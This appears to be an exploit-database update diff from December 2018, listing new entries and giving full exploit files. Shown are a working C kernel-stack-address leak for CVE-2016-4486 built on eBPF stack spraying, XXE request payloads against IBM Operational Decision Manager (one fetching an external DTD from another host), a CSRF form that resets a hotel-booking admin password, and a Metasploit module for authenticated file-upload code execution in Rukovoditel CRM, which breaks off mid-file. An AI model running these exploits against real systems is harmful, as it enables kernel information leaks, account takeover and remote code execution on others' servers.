DB: 2018-12-20

12 changes to exploits/shellcodes

MiniShare Server 1.3.2 - Remote Denial of Service
MiniShare 1.3.2 - Remote Denial of Service

MiniShare 1.5.5 - Local Buffer Overflow (SEH)
MiniShare 1.5.5 - 'users.txt' Local Buffer Overflow (SEH)
Linux Kernel 4.4 - 'rtnetlink' Stack Memory Disclosure
PassFab RAR 9.3.2 - Buffer Overflow (SEH)
LanSpy 2.0.1.159 - Local Buffer Overflow
PDF Explorer 1.5.66.2 - Buffer Overflow (SEH)

MiniShare HTTP 1.5.5 - Remote Buffer Overflow
MiniShare 1.5.5 - Remote Buffer Overflow

MiniShare 1.4.1 - Remote Buffer Overflow HEAD and POST Method
MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow
Hotel Booking Script 3.4 - Cross-Site Request Forgery (Change Admin Password)
Rukovoditel Project Management CRM 2.3.1 - Remote Code Execution (Metasploit)
Integria IMS 5.0.83 - 'search_string' Cross-Site Scripting
Integria IMS 5.0.83 - Cross-Site Request Forgery
Bolt CMS < 3.6.2 - Cross-Site Scripting
Yeswiki Cercopitheque - 'id' SQL Injection
IBM Operational Decision Manager 8.x - XML External Entity Injection

Linux/x64 - Disable ASLR Security Shellcode (93 Bytes)

exploits/linux/local/46006.c

@@ -0,0 +1,503 @@
+/*
+ * [ Briefs ] 
+ *    - CVE-2016-4486 has discovered and reported by Kangjie Lu.
+ *    - This is local exploit against the CVE-2016-4486.
+ *
+ * [ Tested version ]
+ *    - Distro :  Ubuntu 16.04
+ *    - Kernel version :  4.4.0-21-generic
+ *    - Arch : x86_64
+ *
+ * [ Prerequisites ]
+ *    - None
+ *
+ * [ Goal ]
+ *    - Leak kernel stack base address of current process by exploiting CVE-2016-4486.
+ *
+ * [ Exploitation ]
+ *    - CVE-2016-4486 leaks 32-bits arbitrary kernel memory from uninitialized stack.
+ *    - This exploit gets 61-bits stack base address among the 64-bits full address.
+ *      remaining 3-bits is not leaked because of limitation of ebpf.
+ *    - Full exploitation are performed as follows.
+ *
+ *    1. Spraying kernel stack as kernel stack address via running ebpf program.
+ *       - We can spray stack up to 512-bytes by running ebpf program.
+ *       - After this step, memory to be leaked will be filled with kernel stack address.
+ *    2. Trigger CVE-2016-4486 to leak 4-bytes which is low part of stack address.
+ *       - After this step, stack address :  0xffff8800????????;  (? is unknown address yet.)
+ *    3. Leak high 4-bytes of stack address. The leaking is done as one-by-one bit. why one-by-one?
+ *       - CVE-2016-4486 allows to leak 4-bytes only, so that we always get low 4-bytes of stack address.
+ *       - Then, How to overcome this challenge?? The one of possible answer is that
+ *         do operation on high-4bytes with carefully selected value which changes low-4bytes.
+ *         For example, Assume that real stack address is 0xffff880412340000;
+ *         and, do sub operation. ==> 0xffff880412340000 - 0x0000000012360000 (selected value);
+ *         The result will be "0xffff8803....." ==> Yap! low 4-bytes are changed!! and We can see this!
+ *         The result makes us to know that high 4-bytes are smaller than 0x12360000;
+ *         Then, We can keep going with smaller value.
+ *       - The algorithm is quite similar to quick-search.
+ *    4. Unfortunately, ebpf program limitation stops us to leak full 64-bits.
+ *       - 3-bits (bit[16], bit[15], bit[14]) are not leaked.
+ *       - But, Since 3-bit is not sufficient randomness, It's very valuable for attacker.
+ *    Bonus) Why do I use compat_sendmsg() instead of normal sendmsg()?
+ *       - When I did spraying stack with normal sendmsg(), I couldn't spray up to memory to be leaked.
+ *       - If I use compat-sendmsg(), The execution path will be different from normal sendmsg().
+ *         This makes me to spray it more far.
+ *
+ * [ Run exploit ]
+ *    - $ gcc poc.c -o poc
+ *    - $ ./poc
+ *        ....
+ *        ....
+ *        leak stack address range :
+ *        -----from :  ffff88007f7e0000
+ *        --------to : ffff88007f7fc000
+ *       (Since we can get 61-bit address, Print the possible address range out.)
+ *
+ * [ Contact ]
+ *    - jinb.park7@gmail.com
+ *    - github.com/jinb-park
+ */
+
+#include <asm/types.h>
+#include <linux/netlink.h>
+#include <linux/rtnetlink.h>
+#include <sys/socket.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <errno.h>
+#include <string.h>
+#include <unistd.h>
+#include <stdint.h>
+#include <sys/syscall.h>
+#include <asm/unistd_64.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sys/mman.h>
+#include <sys/ioctl.h>
+#include <linux/bpf.h>
+#include <linux/filter.h>
+
+#define GPLv2 "GPL v2"
+#define ARRSIZE(x) (sizeof(x) / sizeof((x)[0]))
+
+#define INTERFACE_INDEX (0)
+#define LEAK_OFFSET (28)
+
+/*
+ * BPF-based stack sprayer
+ */
+/* registers */
+/* caller-saved: r0..r5 */
+#define BPF_REG_ARG1    BPF_REG_1
+#define BPF_REG_ARG2    BPF_REG_2
+#define BPF_REG_ARG3    BPF_REG_3
+#define BPF_REG_ARG4    BPF_REG_4
+#define BPF_REG_ARG5    BPF_REG_5
+#define BPF_REG_CTX     BPF_REG_6
+#define BPF_REG_FP      BPF_REG_10
+
+#define BPF_MOV32_REG(DST, SRC)                 \
+  ((struct bpf_insn) {                          \
+    .code  = BPF_ALU | BPF_MOV | BPF_X,       \
+    .dst_reg = DST,                             \
+    .src_reg = SRC,                             \
+    .off   = 0,                                 \
+    .imm   = 0 })
+#define BPF_LDX_MEM(SIZE, DST, SRC, OFF)        \
+  ((struct bpf_insn) {                          \
+    .code  = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,\
+    .dst_reg = DST,                             \
+    .src_reg = SRC,                             \
+    .off   = OFF,                               \
+    .imm   = 0 })
+#define BPF_ST_MEM(SIZE, DST, OFF, IMM)         \
+  ((struct bpf_insn) {                          \
+    .code  = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \
+    .dst_reg = DST,                             \
+    .src_reg = 0,                               \
+    .off   = OFF,                               \
+    .imm   = IMM })
+#define BPF_STX_MEM(SIZE, DST, SRC, OFF)        \
+  ((struct bpf_insn) {                          \
+    .code  = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,\
+    .dst_reg = DST,                             \
+    .src_reg = SRC,                             \
+    .off   = OFF,                               \
+    .imm   = 0 })
+#define BPF_STX_ADD_MEM(SIZE, DST, SRC, OFF)        \
+  ((struct bpf_insn) {                          \
+    .code  = BPF_STX | BPF_XADD | BPF_SIZE(SIZE),\
+    .dst_reg = DST,                             \
+    .src_reg = SRC,                             \
+    .off   = OFF,                               \
+    .imm   = 0 })
+#define BPF_MOV64_IMM(DST, IMM)                 \
+  ((struct bpf_insn) {                          \
+    .code  = BPF_ALU64 | BPF_MOV | BPF_K,       \
+    .dst_reg = DST,                             \
+    .src_reg = 0,                               \
+    .off   = 0,                                 \
+    .imm   = IMM })	
+#define BPF_EXIT_INSN()                         \
+  ((struct bpf_insn) {                          \
+    .code  = BPF_JMP | BPF_EXIT,                \
+    .dst_reg = 0,                               \
+    .src_reg = 0,                               \
+    .off   = 0,                                 \
+    .imm   = 0 })
+#define BPF_MOV64_REG(DST, SRC)                 \
+  ((struct bpf_insn) {                          \
+    .code  = BPF_ALU64 | BPF_MOV | BPF_X,       \
+    .dst_reg = DST,                             \
+    .src_reg = SRC,                             \
+    .off   = 0,                                 \
+    .imm   = 0 })
+#define BPF_ALU64_IMM(OP, DST, IMM)             \
+  ((struct bpf_insn) {                          \
+    .code  = BPF_ALU64 | BPF_OP(OP) | BPF_K,    \
+    .dst_reg = DST,                             \
+    .src_reg = 0,                               \
+    .off   = 0,                                 \
+    .imm   = IMM })
+#define BPF_ALU64_REG(OP, DST, SRC)             \
+  ((struct bpf_insn) {                          \
+    .code  = BPF_ALU64 | BPF_OP(OP) | BPF_X,    \
+    .dst_reg = DST,                             \
+    .src_reg = SRC,                             \
+    .off   = 0,                                 \
+    .imm   = 0 })
+
+int bpf_(int cmd, union bpf_attr *attrs)
+{
+    return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
+}
+
+int prog_load(struct bpf_insn *insns, size_t insns_count)
+{
+    char verifier_log[100000];
+    union bpf_attr create_prog_attrs = {
+        .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
+        .insn_cnt = insns_count,
+        .insns = (uint64_t)insns,
+        .license = (uint64_t)GPLv2,
+        .log_level = 1,
+        .log_size = sizeof(verifier_log),
+        .log_buf = (uint64_t)verifier_log
+    };
+    int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs);
+    int errno_ = errno;
+    errno = errno_;
+    if (progfd == -1) {
+		printf("bpf prog load error\n");
+		exit(-1);
+	}
+    return progfd;
+}
+
+int create_socket_by_socketpair(int *progfd)
+{
+	int socks[2];
+    if (socketpair(AF_UNIX, SOCK_SEQPACKET, 0, socks)) {
+        printf("socketpair error\n");
+        exit(-1);
+    }
+    if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, progfd, sizeof(int))) {
+        printf("setsockopt error\n");
+        exit(-1);
+    }
+    return socks[1];
+}
+
+int create_filtered_socket_fd(struct bpf_insn *insns, size_t insns_count)
+{
+    int progfd = prog_load(insns, insns_count);
+	return create_socket_by_socketpair(&progfd);
+}
+
+#define NR_sendmsg_32 370	// for 32-bit
+
+typedef unsigned int compat_uptr_t;
+typedef int compat_int_t;
+typedef unsigned int compat_size_t;
+typedef unsigned int compat_uint_t;
+
+struct compat_msghdr {
+    compat_uptr_t   msg_name;   /* void * */
+    compat_int_t    msg_namelen;
+    compat_uptr_t   msg_iov;    /* struct compat_iovec * */
+    compat_size_t   msg_iovlen;
+    compat_uptr_t   msg_control;    /* void * */
+    compat_size_t   msg_controllen;
+    compat_uint_t   msg_flags;
+};
+struct compat_iovec {
+    compat_uptr_t   iov_base;
+    compat_size_t   iov_len;
+};
+
+int sendmsg_by_legacy_call(int fd, unsigned int msg, int flags)
+{
+	int r = -1;
+
+	asm volatile (
+		"push %%rax\n"
+		"push %%rbx\n"
+		"push %%rcx\n"
+		"push %%rdx\n"
+		"push %%rsi\n"
+		"push %%rdi\n"
+		"mov %1, %%eax\n"
+		"mov %2, %%ebx\n"
+		"mov %3, %%ecx\n"
+		"mov %4, %%edx\n"
+		"int $0x80\n"
+		"mov %%eax, %0\n"
+		"pop %%rdi\n"
+		"pop %%rsi\n"
+		"pop %%rdx\n"
+		"pop %%rcx\n"
+		"pop %%rbx\n"
+		"pop %%rax\n"
+		: "=r" (r)
+		: "r"(NR_sendmsg_32), "r"(fd), "r"(msg), "r"(flags)
+		: "memory", "rax", "rbx", "rcx", "rdx", "rsi", "rdi"
+	);
+
+	return r;
+}
+
+#define COMPAT_SENDMSG
+void trigger_proc(int sockfd)
+{
+#ifdef COMPAT_SENDMSG
+	struct compat_msghdr *msg = NULL;
+	struct compat_iovec *iov = NULL;
+#else
+	struct msghdr *msg = NULL;
+	struct iovec *iov = NULL;
+#endif
+	char *buf = NULL;
+	int r;
+
+	// allocate under-32-bit address for compat syscall
+	msg = mmap(0x70000, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
+	if (msg == MAP_FAILED) {
+		printf("mmap error : %d, %s\n", errno, strerror(errno));
+		exit(0);
+	}
+	buf = mmap(0x90000, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
+	if (buf == MAP_FAILED) {
+		printf("mmap error : %d, %s\n", errno, strerror(errno));
+		exit(0);
+	}
+	iov = mmap(0xb0000, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
+	if (buf == MAP_FAILED) {
+		printf("mmap error : %d, %s\n", errno, strerror(errno));
+		exit(0);
+	}
+
+#ifdef COMPAT_SENDMSG
+	iov->iov_base = (compat_uptr_t)buf;
+#else
+	iov->iov_base = buf;
+#endif
+	iov->iov_len = 128;
+	msg->msg_name = NULL;
+	msg->msg_namelen = 0;
+#ifdef COMPAT_SENDMSG
+	msg->msg_iov = (compat_uptr_t)iov;
+#else
+	msg->msg_iov = iov;
+#endif
+	msg->msg_iovlen = 1;
+	msg->msg_control = NULL;
+	msg->msg_controllen = 0;
+	msg->msg_flags = 0;
+
+#ifdef COMPAT_SENDMSG
+	r = sendmsg_by_legacy_call(sockfd, (unsigned int)msg, 0);
+#else
+	r = sendmsg(sockfd, msg, 0);
+#endif
+	if (r < 0) {
+		printf("sendmsg error, %d, %s\n", errno, strerror(errno));
+		exit(-1);
+	}
+}
+
+int sockfds = -1;
+
+void stack_spraying_by_bpf(unsigned long val)
+{
+	int r;
+
+	struct bpf_insn stack_spraying_insns[] = {
+		BPF_MOV64_REG(BPF_REG_3, BPF_REG_FP),
+		BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -val),
+
+		BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -368),
+		BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -376),
+		BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -384),
+		BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -392),
+		BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -400),
+		BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -408),
+		BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -416),
+		BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -424),
+		BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -432),
+		BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -440),
+		BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -448),
+		BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -456),
+		BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -464),
+		BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -472),
+		BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -480),
+		BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -488),
+		BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -496),
+		BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -504),
+		BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -512),
+
+		BPF_MOV64_IMM(BPF_REG_0, 0),
+		BPF_EXIT_INSN()
+	};
+
+	sockfds = create_filtered_socket_fd(stack_spraying_insns, ARRSIZE(stack_spraying_insns));
+	if (sockfds < 0)
+		return;
+
+	trigger_proc(sockfds);
+    close(sockfds);
+	//sleep(1);
+}
+
+/*
+28byte, 32byte including padding
+struct rtnl_link_ifmap {
+    __u64   mem_start;
+    __u64   mem_end;
+    __u64   base_addr;
+    __u16   irq;
+    __u8    dma;
+    __u8    port;
+};*/
+
+// rtnl_fill_link_ifmap <-- rtnl_fill_ifinfo (symbol)
+
+struct {
+	struct nlmsghdr nh;
+	struct ifinfomsg ifm;
+	char attrbuf[512];
+} req;
+
+// Ubuntu 4.4.0-21-generic
+#define RANGE_MIN_MASK ~((1<<16) | (1<<15) | (1<<14)) // and
+#define RANGE_MAX_MASK ((1<<16) | (1<<15) | (1<<14)) // or
+
+int main(int argc, char **argv)
+{
+	unsigned char buf[65535];
+  	unsigned char map_buf[36] = {0,};
+  	struct nlmsghdr *nl_msg_ptr;
+  	struct ifinfomsg *inf_msg_ptr;
+  	struct rtnl_link_ifmap *map_ptr;
+  	struct rtattr *rta_ptr;
+  	int size, len, attr_len, offset;
+	int progfd;
+	unsigned int sub_val = 0;
+	unsigned int leak_value;
+	unsigned long leak_full_stack = 0;
+	unsigned int low_stack = 0;
+	int i;
+
+	for (i=0; i<16; i++) {
+		int rtnetlink_sk = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_ROUTE);
+
+		memset(&req, 0, sizeof(req));
+
+		req.nh.nlmsg_len = NLMSG_LENGTH(sizeof(struct ifinfomsg));
+		req.nh.nlmsg_flags = NLM_F_DUMP | NLM_F_REQUEST;
+		req.nh.nlmsg_type = RTM_GETLINK;
+		req.nh.nlmsg_seq = 1;
+
+		req.ifm.ifi_family = AF_UNSPEC;
+		req.ifm.ifi_index = INTERFACE_INDEX;
+		req.ifm.ifi_change = 0xffffffff;
+	
+		if (i == 0)
+			sub_val = 0;
+		else
+			sub_val += (1 << (32 - i));
+
+		stack_spraying_by_bpf((unsigned long)sub_val);
+		if (send(rtnetlink_sk, &req, req.nh.nlmsg_len, 0) < 0) {
+			printf("send error\n");
+			goto out;
+		}
+
+		while (1) {
+			if ((size = recv(rtnetlink_sk, buf, sizeof(buf), 0)) < 0) {
+				fprintf(stderr, "ERROR recv(): %s\n", strerror(errno));
+				goto out;
+			}
+			
+			for (nl_msg_ptr = (struct nlmsghdr *)buf; size > (int)sizeof(*nl_msg_ptr);) {
+				len = nl_msg_ptr->nlmsg_len;
+
+				if (nl_msg_ptr->nlmsg_type == NLMSG_ERROR) {
+					printf("NLMSG_ERROR\n");
+					goto out;
+				}
+				else if (nl_msg_ptr->nlmsg_type == NLMSG_DONE)
+					break;
+
+				if (!NLMSG_OK(nl_msg_ptr, (unsigned int)size)) {
+					printf("Not OK\n");
+					goto out;
+				}
+
+				attr_len = IFLA_PAYLOAD(nl_msg_ptr);
+				inf_msg_ptr = (struct ifinfomsg *)NLMSG_DATA(nl_msg_ptr);
+				rta_ptr = (struct rtattr *)IFLA_RTA(inf_msg_ptr);
+
+				for (; RTA_OK(rta_ptr, attr_len); rta_ptr = RTA_NEXT(rta_ptr, attr_len)) {
+					if (rta_ptr->rta_type == IFLA_MAP) {
+						if (rta_ptr->rta_len != sizeof(map_buf)) {
+							printf("wrong size\n");
+							goto out;
+						}
+
+						memcpy(map_buf, RTA_DATA(rta_ptr), sizeof(map_buf));
+						map_ptr = &map_buf;
+						leak_value = *(unsigned int *)(map_buf + LEAK_OFFSET);
+						printf("leak_value : %08x\n", leak_value);
+						break;
+					}
+				}		
+
+				size -= NLMSG_ALIGN(len);
+				nl_msg_ptr = (struct nlmsghdr *)((char *)nl_msg_ptr + NLMSG_ALIGN(len));
+			}
+
+			break;
+		}
+
+		if (low_stack == 0)
+			low_stack = leak_value;
+		else
+			if (leak_value != low_stack)
+				sub_val &= (~(1 << (32 - i)));	// clear bit
+
+		memcpy((unsigned char *)&leak_full_stack + 4, &low_stack, 4);
+		memcpy((unsigned char *)&leak_full_stack, &sub_val, 4);
+		printf("[try-%d] stack address : %lx\n", i, leak_full_stack);
+out:
+		close(rtnetlink_sk);
+	}
+
+	printf("=======================================================================\n");
+	printf("leak stack address range : \n");
+	printf("-----from :  %lx\n", leak_full_stack & RANGE_MIN_MASK);
+	printf("--------to : %lx\n", leak_full_stack | RANGE_MAX_MASK);
+	printf("======================================================================\n");
+	
+	return 0;
+}

exploits/multiple/webapps/46017.txt

@@ -0,0 +1,48 @@
+# Exploit Title: [XML External Entity Injection (XXE)]
+# Date: [2018-12-18]
+# Exploit Author: [Mohamed M.Fouad - From SecureMisr Company]
+# Vendor Homepage: [https://www-01.ibm.com/support/docview.wss?uid=ibm10744149]
+# Version: [v8.6 - v8.7 - v8.8 - v8.9] (REQUIRED)
+# Tested on: [Windows 10]
+# CVE : [CVE-2018-1821]
+
+POC#1: Port Scanning:
+======================
+POST /res/api/v1/ruleapps?csrf_token=kgwGZpsLIpCrCuS3s2mLS4%2BuXKM%3D HTTP/1.1
+Host: 172.25.28.35:9443
+Connection: close
+Content-Length: 83
+Origin: https://172.25.28.35:9443
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
+Content-Type: application/xml
+Accept: */*
+Referer: https://172.25.28.35:9443/res/protected/rest.jsf
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: JSESSIONID=0000EKq5uAZFEICNv26D32qeVid:1c4i4k9om; LtpaToken2=Py4PGunQHKXqtYpW0R+1XxlcENqSI/5/RCinV7Cl0g8WlAWAfff5IAPwHJDWZL+LFtTTT+tfmADp38hW7xVieS74jJB79m1IDfIpeGvKOzJ99NmTkV0uPm22vdUZp8qKF8Xt3J7mO5L1tTohHdIg/eXZj2hZxWfLYf2KyGyqJ+D16g4fIu7zazZProW9RDgdoGpppM/Wfkxst8iQAj6+4a3tdyJkNJ8+QdPeakHYCbFA6aTcNXncwkWsKDwznGZ30pLXSxp8wKJaESkkuY5F4w6lLGVw7d6p34M6aDQGixkR4J7I+ZLQ0OE9Fzt6Aq+AETBcMLFqPOpPEMtrZkkExey8Lc9hMRs5tAVXramTT6h38uquu/2DyqfOaJeRATM8tO4UZs7clSsXQjsbU9s/ueFZR8YA9qrXUTChoysZtCrXTdmqs87FiqwLZNzWI7bUjf8crCNDJgYzPVsnK0Oo46Hdi8nlKhvr8pzxSMblS4gjgSsKo8MYDi/uzexkqMB3ddTGp9vUVEG30L9Ya9Z4v7D9WusN7fJxn1x3g9NmtWMe6uCsyIRFU0+RADGsKYfsC09NItUciIo9GnJdrsla9TnaqVaiQhu85GpT6LPrZs0wPjV6WYGTOLMMd2Z/VVjaTn9pU5mPQlT/dFVbLoJvNI+uS66GP1HmXgj8ofe5J/o=
+
+<?xml version="1.0" encoding="utf-8"?>
+<!DOCTYPE data SYSTEM "ftp://127.0.0.1:21">
+
+
+
+POC#2: Using External DTD File:
+======================================
+POST /rest/bpm/monitor/events HTTP/1.1
+Host: 172.25.28.41:9445
+Connection: close
+Cache-Control: max-age=0
+Authorization: Basic Ym1hZG1pbjpibWFkbWlu
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Content-Type: text/xml
+SOAPAction: "CBE_FOR_EACH_TRANSACTION_REQUESTI"
+Accept-Language: en-US,en;q=0.9
+Cookie: JSESSIONID=00002W7K2hStpCQu03vef0J3Lyt:1cd2vk5q4; com.ibm.wbimonitor.UserName=bmadmin; MUMLogoutURL=https://172.25.28.41:9445/mum/logout; LtpaToken2=RKW0datOtQMYCPkxs8YAKklRMLNsYHWe264hjvsRMBjvc6AW29/OVsNJA8pO8MQQMBXOfBuWtNQPWVJ/cw55YdzVyfPdLG8d+cQ77kt7XiE77scfNfPCVU77zcFaG8qVO8xUXXX5U4+nTxlXNIEQR1iMPN2+w3rnAIZcDL7vgK3YN0QPGAn8rQmrYswXoBf6WmgI8uc0yA/PNRIXL5Lt9DeqJCU0C/E2FvJ9nK8T8uQqPPiS63EOutom825arJYLV9zndN1ArgdwAAOMO61Top9bM/VsMh/ryshaj6CsfrmaBvFt5FIVfvLN5u2iEQq0KVCxPAlH5yceSQV5gP884rhiN9M1N/QOQ54k3F1ZMBkfhDofJyDqsXMOMCaTXTsoyWhsC/KLPcjC3thQQxxijDrM7Yql411tUDv08xdDzu7apEF5QBuGrVd2Pgg5luKWmcao5BduwSXwaKJEQXnULAbYacr48gol7aHJucPhY6JqkFgvjvV4XfFNM1jsWbA+09KD2F0GALjNzLMb54sI5RLhHLVZu/LBL3RWrZFPPSE0D9YW2LrKtNGHBkFeuw/I8ULL/JjlfWHHheZug5t45H1oNPHpQp843GwTAbWGtNCb7rZLgA7+jCR2OYmtg8vrlJFvSzhSxg6ahYppX1PouekOuNvC7EvR51PHcw2qJRE=
+Content-Length: 99
+
+<?xml version="1.0" encoding="utf-8"?>
+<!DOCTYPE data SYSTEM "http://172.17.85.67:5555/mydtd.dtd">

exploits/php/webapps/46010.html

@@ -0,0 +1,45 @@
+# Exploit Title: Admin Account take over Via CSRF
+# Google Dork: N/A
+# Date: 17-12-2018
+# Exploit Author: Sainadh Jamalpur
+# Vendor Homepage: https://www.phpjabbers.com/hotel-booking-system/
+# Software Link: https://demo.phpjabbers.com/1545033057_422/index.php?controller=pjAdmin&action=pjActionIndex
+# Version: 3.4
+# Tested on: Windows x64/ Kali linux x64
+# CVE : N/A
+
+************************Description:**********************
+
+The online hotel reservation system is built in PHP and uses MySQL to
+store data. The script provides a powerful room booking and reservation
+management functionality and allows you to install a clear
+call-to-action tool on your hotel website which will impact conversions
+and increase bookings. Our room booking system is highly customizable
+and compatible with various website types.
+
+*************************Vulnerability Description:****************
+ An attacker can take the admin account via sending the Malicious link
+to the authenticated user then the Victim clicks on the malicious link
+then the admin password is change
+
+************************************
+PoC**************************************
+
+
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="https://site.com/admin/index.php?controller=pjAdminUsers&action=pjActionUpdate"
+method="POST">
+      <input type="hidden" name="user&#95;update" value="1" />
+      <input type="hidden" name="id" value="1" />
+      <input type="hidden" name="role&#95;id" value="1" />
+      <input type="hidden" name="email" value="admin&#64;admin&#46;com" />
+      <input type="hidden" name="password" value="pass1234" />
+      <input type="hidden" name="name" value="Administrator" />
+      <input type="hidden" name="phone" value="" />
+      <input type="hidden" name="status" value="T" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>

exploits/php/webapps/46011.rb

@@ -0,0 +1,204 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'uri'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+    def initialize
+    super(
+      'Name'           => 'Rukovoditel Project Management/CRM 2.3.1 -
+(Authenticated) Remote Code Execution',
+      'Description'    => %q{
+        This module exploits a file upload vulnerability in Rukovoditel
+PM/CRM version 2.3.1.
+        Application allows the user to upload a background image, and does
+not perform extension checking exactly.
+        Application agrees to upload if "gif" file header is added to the
+header of our payload file.
+        However, many file types do not have permission to work.
+".htaccess" is blocking that.
+        it has file extension check as follows,
+        <FilesMatch "\.(php([0-9]|s)?|s?p?html|cgi|pl|exe)$">
+        There is no upper and lower case control. Therefore, the extension
+of our file can be .pHp .Php .PhP and such.
+        The module is uploading by create a payload as above to get
+Meterpreter session.
+      },
+      'Author'         => [
+        'AkkuS <Özkan Mustafa Akkuş>', # Vulnerability Discovery, PoC & Msf
+Module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL', '
+https://pentest.com.tr/exploits/Rukovoditel-Project-Management-CRM-2-3-1-Authenticated-Remote-Code-Execution.html'],
+
+          ['CVE', '2018-20166'],
+        ],
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        =>
+        [
+          ['Rukovoditel PM/CRM <= 2.3.1', {}]
+        ],
+      'DisclosureDate' => '14 Dec 2018',
+      'Privileged'     => false,
+      'DefaultTarget' => 0
+    )
+
+    register_options(
+        [
+          OptString.new('TARGETURI', [true, 'The base path to i-doit',
+'/']),
+          OptString.new('USER', [true, 'User to login with', 'admin']),
+          OptString.new('PASS', [true, 'Password to login with',
+'password']),
+        ], self.class)
+    end
+##
+# Exploitation of Vulnerability
+##
+  def exploit
+
+    random_value = Rex::Text.rand_text_alpha(10)
+    sid_md5 = Digest::MD5.hexdigest random_value
+    print_status("sid = #{sid_md5}")
+
+    cookie = "cookie_test=please_accept_for_session;" + " sid=" + sid_md5
+
+    res1 = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri,
+"/index.php?module=users/login"),
+      'cookie'   => cookie,
+    })
+        if not (res1 and res1.body =~ /form_session_token\"
+value=\"([^\"]+)\"/)
+            return nil
+        end
+    token = $1
+##
+# Authorized User Login
+##
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri,
+"/index.php?module=users/login&action=login"),
+      'cookie'   => cookie,
+      'vars_post' => {
+          "form_session_token" => token,
+          "username" => datastore['USER'],
+          "password" => datastore['PASS']
+
+      }
+    })
+##
+# Login Control
+##
+
+    tok = send_request_cgi({
+      'method'   => 'GET',
+      'cookie'   => cookie,
+      'uri'      => normalize_uri(target_uri,
+"/index.php?module=dashboard/"),
+    })
+
+    html = tok.body
+    if html =~ /Rukovoditel/
+      print_good("Login Successful")
+    else
+      print_status("User information is incorrect. Login failed")
+      exit 0
+    end
+##
+# Arbitrary ".pHp" file upload
+##
+
+    boundary = Rex::Text.rand_text_alphanumeric(29)
+
+    data = "-----------------------------{boundary}\r\n"
+    data << "Content-Disposition: form-data;
+name=\"form_session_token\"\r\n"
+    data << "\r\n"
+    data << "{token}"
+    data << "\r\n-----------------------------{boundary}\r\n"
+    data << "Content-Disposition: form-data;
+name=\"CFG[LOGIN_PAGE_HEADING]\"\r\n"
+    data <<
+"\r\nPage-Heading\r\n-----------------------------{boundary}\r\n"
+    data << "Content-Disposition: form-data;
+name=\"CFG[LOGIN_PAGE_CONTENT]\"\r\n"
+    data << "\r\nPage-Desc\r\n-----------------------------{boundary}\r\n"
+    data << "Content-Disposition: form-data;
+name=\"APP_LOGIN_PAGE_BACKGROUND\"; filename=\"akkus.pHp\"\r\n"
+    data << "Content-Type: binary/octet-stream\r\n"
+    data << "\r\n"
+    data << "GIF89a;\n<html>\n"
+    data << "\n</html>\n"
+    data << payload.encoded
+    data << "\r\n-----------------------------{boundary}\r\n"
+    data << "Content-Disposition: form-data;
+name=\"CFG[APP_LOGIN_PAGE_BACKGROUND]\"\r\n"
+    data << "\r\n{upload_name}\r\n"
+    data << "-----------------------------{boundary}\r\n"
+    data << "Content-Disposition: form-data;
+name=\"CFG[LOGIN_PAGE_HIDE_REMEMBER_ME]\"\r\n"
